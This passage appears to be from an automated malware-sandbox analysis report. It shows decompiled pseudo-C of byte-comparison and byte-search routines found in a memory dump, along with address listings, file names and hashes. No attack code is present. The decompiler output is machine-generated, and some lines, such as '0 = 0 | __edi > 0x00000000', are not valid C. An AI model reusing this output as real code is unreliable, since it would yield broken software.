									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x00c48b8f
0x00c48b8f
0x00c48b95
0x00c48c0c
0x00c48c0e
0x00c48c10
0x00000000
0x00000000
0x00c48c16
0x00c48c1c
0x00c48ca3
0x00c48ca5
0x00c48ca7
0x00000000
0x00000000
0x00c48cad
0x00c48cb3
0x00c48d3a
0x00c48d3c
0x00c48d3e
0x00000000
0x00000000
0x00c48d44
0x00c48d4a
0x00c48dd1
0x00c48dd3
0x00c48dd5
0x00000000
0x00000000
0x00c48ddb
0x00c48de1
0x00c48e68
0x00c48e6a
0x00c48e6c
0x00000000
0x00000000
0x00c48e78
0x00c48f00
0x00c48f02
0x00c48f04
0x00000000
0x00000000
0x00c48f0a
0x00c48f10
0x00c48f97
0x00c48f99
0x00c48f9b
0x00c48fa9
0x00c48fab
0x00c48fb8
0x00c48fb8
0x00c48fab
0x00000000
0x00c48f9b
0x00c48f1d
0x00c48f1f
0x00c48f37
0x00c48f3f
0x00c48f41
0x00c48f59
0x00c48f61
0x00c48f63
0x00c48f7b
0x00c48f83
0x00c48f85
0x00c48f8e
0x00c48f8e
0x00000000
0x00c48f85
0x00c48f6c
0x00c48f75
0x00000000
0x00000000
0x00000000
0x00c48f75
0x00c48f4a
0x00c48f53
0x00000000
0x00000000
0x00000000
0x00c48f53
0x00c48f28
0x00c48f31
0x00000000
0x00000000
0x00000000
0x00c48f31
0x00c48e86
0x00c48e88
0x00c48ea0
0x00c48ea8
0x00c48eaa
0x00c48ec2
0x00c48eca
0x00c48ecc
0x00c48ee4
0x00c48eec
0x00c48eee
0x00c48ef7
0x00c48ef7
0x00000000
0x00c48eee
0x00c48ed5
0x00c48ede
0x00000000
0x00000000
0x00000000
0x00c48ede
0x00c48eb3
0x00c48ebc
0x00000000
0x00000000
0x00000000
0x00c48ebc
0x00c48e91
0x00c48e9a
0x00000000
0x00000000
0x00000000
0x00c48e9a
0x00c48dee
0x00c48df0
0x00c48e08
0x00c48e10
0x00c48e12
0x00c48e2a
0x00c48e32
0x00c48e34
0x00c48e4c
0x00c48e54
0x00c48e56
0x00c48e5f
0x00c48e5f
0x00000000
0x00c48e56
0x00c48e3d
0x00c48e46
0x00000000
0x00000000
0x00000000
0x00c48e46
0x00c48e1b
0x00c48e24
0x00000000
0x00000000
0x00000000
0x00c48e24
0x00c48df9
0x00c48e02
0x00000000
0x00000000
0x00000000
0x00c48e02
0x00c48d57
0x00c48d59
0x00c48d71
0x00c48d79
0x00c48d7b
0x00c48d93
0x00c48d9b
0x00c48d9d
0x00c48db5
0x00c48dbd
0x00c48dbf
0x00c48dc8
0x00c48dc8
0x00000000
0x00c48dbf
0x00c48da6
0x00c48daf
0x00000000
0x00000000
0x00000000
0x00c48daf
0x00c48d84
0x00c48d8d
0x00000000
0x00000000
0x00000000
0x00c48d8d
0x00c48d62
0x00c48d6b
0x00000000
0x00000000
0x00000000
0x00c48d6b
0x00c48cc0
0x00c48cc2
0x00c48cda
0x00c48ce2
0x00c48ce4
0x00c48cfc
0x00c48d04
0x00c48d06
0x00c48d1e
0x00c48d26
0x00c48d28
0x00c48d31
0x00c48d31
0x00000000
0x00c48d28
0x00c48d0f
0x00c48d18
0x00000000
0x00000000
0x00000000
0x00c48d18
0x00c48ced
0x00c48cf6
0x00000000
0x00000000
0x00000000
0x00c48cf6
0x00c48ccb
0x00c48cd4
0x00000000
0x00000000
0x00000000
0x00c48cd4
0x00c48c29
0x00c48c2b
0x00c48c43
0x00c48c4b
0x00c48c4d
0x00c48c65
0x00c48c6d
0x00c48c6f
0x00c48c87
0x00c48c8f
0x00c48c91
0x00c48c9a
0x00c48c9a
0x00000000
0x00c48c91
0x00c48c78
0x00c48c81
0x00000000
0x00000000
0x00000000
0x00c48c81
0x00c48c56
0x00c48c5f
0x00000000
0x00000000
0x00000000
0x00c48c5f
0x00c48c34
0x00c48c3d
0x00000000
0x00000000
0x00000000
0x00c48b97
0x00c48b97
0x00c48b9e
0x00c48ba0
0x00c48bb4
0x00c48bb4
0x00c48bbc
0x00c48bbe
0x00c48bd2
0x00c48bd2
0x00c48bda
0x00c48bdc
0x00c48bf0
0x00c48bf0
0x00c48bf8
0x00c48bfa
0x00c48c03
0x00c48c03
0x00000000
0x00c48bfa
0x00c48be2
0x00c48be5
0x00c48bee
0x00000000
0x00000000
0x00000000
0x00c48bee
0x00c48bc4
0x00c48bc7
0x00c48bd0
0x00000000
0x00000000
0x00000000
0x00c48bd0
0x00c48ba6
0x00c48ba9
0x00c48bb2
0x00000000
0x00000000
0x00000000
0x00c48bb2
0x00c48b87
0x00c48b87
0x00c49977

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 11109fd36842f5b8b1c7261eead8280ce40185b1224a341634090a363cb34725
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 14C178B22051930EDF1D463A887453EBBA1BAA27B531E076DD8B3CB5D5EF10C66CD520

Uniqueness

Uniqueness Score: -1.00%

Function 00C48777, Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C48777(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x00c48777
0x00c48777
0x00c48777
0x00c4877d
0x00c48804
0x00c48806
0x00c48808
0x00c48b87
0x00c48b87
0x00c49977
0x00c49977
0x00c4880e
0x00c48814
0x00c4889b
0x00c4889d
0x00c4889f
0x00000000
0x00000000
0x00c488a5
0x00c488ab
0x00c48932
0x00c48934
0x00c48936
0x00000000
0x00000000
0x00c4893c
0x00c48942
0x00c489c9
0x00c489cb
0x00c489cd
0x00000000
0x00000000
0x00c489d9
0x00c48a61
0x00c48a63
0x00c48a65
0x00000000
0x00000000
0x00c48a6b
0x00c48a71
0x00c48af8
0x00c48afa
0x00c48afc
0x00000000
0x00000000
0x00c48b02
0x00c48b08
0x00c48b7f
0x00c48b81
0x00c48b83
0x00c48b85
0x00c48b85
0x00000000
0x00c48b83
0x00c48b11
0x00c48b13
0x00c48b27
0x00c48b2f
0x00c48b31
0x00c48b45
0x00c48b4d
0x00c48b4f
0x00c48b63
0x00c48b6b
0x00c48b6d
0x00c48b76
0x00c48b76
0x00000000
0x00c48b6d
0x00c48b58
0x00c48b61
0x00000000
0x00000000
0x00000000
0x00c48b61
0x00c48b3a
0x00c48b43
0x00000000
0x00000000
0x00000000
0x00c48b43
0x00c48b1c
0x00c48b25
0x00000000
0x00000000
0x00000000
0x00c48b25
0x00c48a7e
0x00c48a80
0x00c48a98
0x00c48aa0
0x00c48aa2
0x00c48aba
0x00c48ac2
0x00c48ac4
0x00c48adc
0x00c48ae4
0x00c48ae6
0x00c48aef
0x00c48aef
0x00000000
0x00c48ae6
0x00c48acd
0x00c48ad6
0x00000000
0x00000000
0x00000000
0x00c48ad6
0x00c48aab
0x00c48ab4
0x00000000
0x00000000
0x00000000
0x00c48ab4
0x00c48a89
0x00c48a92
0x00000000
0x00000000
0x00000000
0x00c48a92
0x00c489e7
0x00c489e9
0x00c48a01
0x00c48a09
0x00c48a0b
0x00c48a23
0x00c48a2b
0x00c48a2d
0x00c48a45
0x00c48a4d
0x00c48a4f
0x00c48a58
0x00c48a58
0x00000000
0x00c48a4f
0x00c48a36
0x00c48a3f
0x00000000
0x00000000
0x00000000
0x00c48a3f
0x00c48a14
0x00c48a1d
0x00000000
0x00000000
0x00000000
0x00c48a1d
0x00c489f2
0x00c489fb
0x00000000
0x00000000
0x00000000
0x00c489fb
0x00c4894f
0x00c48951
0x00c48969
0x00c48971
0x00c48973
0x00c4898b
0x00c48993
0x00c48995
0x00c489ad
0x00c489b5
0x00c489b7
0x00c489c0
0x00c489c0
0x00000000
0x00c489b7
0x00c4899e
0x00c489a7
0x00000000
0x00000000
0x00000000
0x00c489a7
0x00c4897c
0x00c48985
0x00000000
0x00000000
0x00000000
0x00c48985
0x00c4895a
0x00c48963
0x00000000
0x00000000
0x00000000
0x00c48963
0x00c488b8
0x00c488ba
0x00c488d2
0x00c488da
0x00c488dc
0x00c488f4
0x00c488fc
0x00c488fe
0x00c48916
0x00c4891e
0x00c48920
0x00c48929
0x00c48929
0x00000000
0x00c48920
0x00c48907
0x00c48910
0x00000000
0x00000000
0x00000000
0x00c48910
0x00c488e5
0x00c488ee
0x00000000
0x00000000
0x00000000
0x00c488ee
0x00c488c3
0x00c488cc
0x00000000
0x00000000
0x00000000
0x00c488cc
0x00c48821
0x00c48823
0x00c4883b
0x00c48843
0x00c48845
0x00c4885d
0x00c48865
0x00c48867
0x00c4887f
0x00c48887
0x00c48889
0x00c48892
0x00c48892
0x00000000
0x00c48889
0x00c48870
0x00c48879
0x00000000
0x00000000
0x00000000
0x00c48879
0x00c4884e
0x00c48857
0x00000000
0x00000000
0x00000000
0x00c48857
0x00c4882c
0x00c48835
0x00000000
0x00000000
0x00000000
0x00c48835
0x00c4878a
0x00c4878c
0x00c487a4
0x00c487ac
0x00c487ae
0x00c487c6
0x00c487ce
0x00c487d0
0x00c487e8
0x00c487f0
0x00c487f2
0x00c487fb
0x00c487fb
0x00000000
0x00c487f2
0x00c487d9
0x00c487e2
0x00000000
0x00000000
0x00000000
0x00c487e2
0x00c487b7
0x00c487c0
0x00000000
0x00000000
0x00000000
0x00c487c0
0x00c48795
0x00c4879e
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 2b10920533d3e1cb47c37280fc8385c8a54e7fa0f4056d90ac5ad398ca3ee23c
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: EDC175B22051930EDF5D463A887453EBBA1AEA27B531E075DD8B3CB5C4EF20D66CD620

Uniqueness

Uniqueness Score: -1.00%

Function 00C47F60, Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C47F60(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}

0x00c47f60
0x00c47f67
0x00c47fbc
0x00c47fbc
0x00c47f69
0x00c47f69
0x00c47f6f
0x00c47f79
0x00c47f91
0x00c47f91
0x00c47f94
0x00c47fa8
0x00c47fa8
0x00c47fab
0x00000000
0x00c47fad
0x00c47fad
0x00c47fad
0x00c47faf
0x00c47fb4
0x00000000
0x00000000
0x00c47fb6
0x00c47fb9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c47fb9
0x00000000
0x00c47fad
0x00c47f96
0x00c47fa3
0x00c47fc2
0x00c47fc4
0x00c47fd2
0x00c47fdb
0x00000000
0x00c47fdd
0x00c47fe0
0x00c47fe2
0x00c4800c
0x00c47fe4
0x00c47fe4
0x00c47fe6
0x00c48006
0x00c47fe8
0x00c47feb
0x00c47fed
0x00c48000
0x00c47fef
0x00c47ff1
0x00000000
0x00c47ff3
0x00000000
0x00c47ff3
0x00c47ff1
0x00c47fed
0x00c47fe6
0x00c47fe2
0x00000000
0x00c47fbd
0x00c47fbd
0x00c47fbd
0x00000000
0x00c47fa7
0x00c47f7b
0x00c47f7b
0x00c47f7b
0x00c47f7d
0x00c47f82
0x00000000
0x00000000
0x00c47f84
0x00c47f87
0x00000000
0x00c47f89
0x00c47f8f
0x00000000
0x00000000
0x00000000
0x00000000
0x00c47f8f
0x00000000
0x00c47f87
0x00c47ff6
0x00c47ffa
0x00c47ffa
0x00c47f79
0x00000000

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 6514b973ef3dad28dd9147a697bd373f29b0cb8c745ac115aafaa7038975fe30
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: B1110D7721C08147F6148AFDD4B46BBE795FBC532172D437AD0614B758D722EB4D9500

Uniqueness

Uniqueness Score: -1.00%

Function 00C654C7, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b90ce4215f5695b7f038348d3807dd3e6df2d524211336fc68a768eefdfdbe
Instruction ID: 2dfe79357dbc414c1a3325f0503eeeb3f2c4c274faddbb50e9d65d5a7f39f47c
Opcode Fuzzy Hash: f5b90ce4215f5695b7f038348d3807dd3e6df2d524211336fc68a768eefdfdbe
Instruction Fuzzy Hash: DCE09235260904AFC750CFA8CC85D15B3E8EB08320B200291F816C73A0DA34EE009A10

Uniqueness

Uniqueness Score: -1.00%

Function 00C65504, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction ID: d8827a8b9bd53a9725a37eb0778babc85be91fbf1637ed3b2cd35d47a3598d1f
Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction Fuzzy Hash: D1E0DF332209049BC7319A0AD884C82F7E9EB887B0FA54422EA4A87620E230FC01CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00C61CC2, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
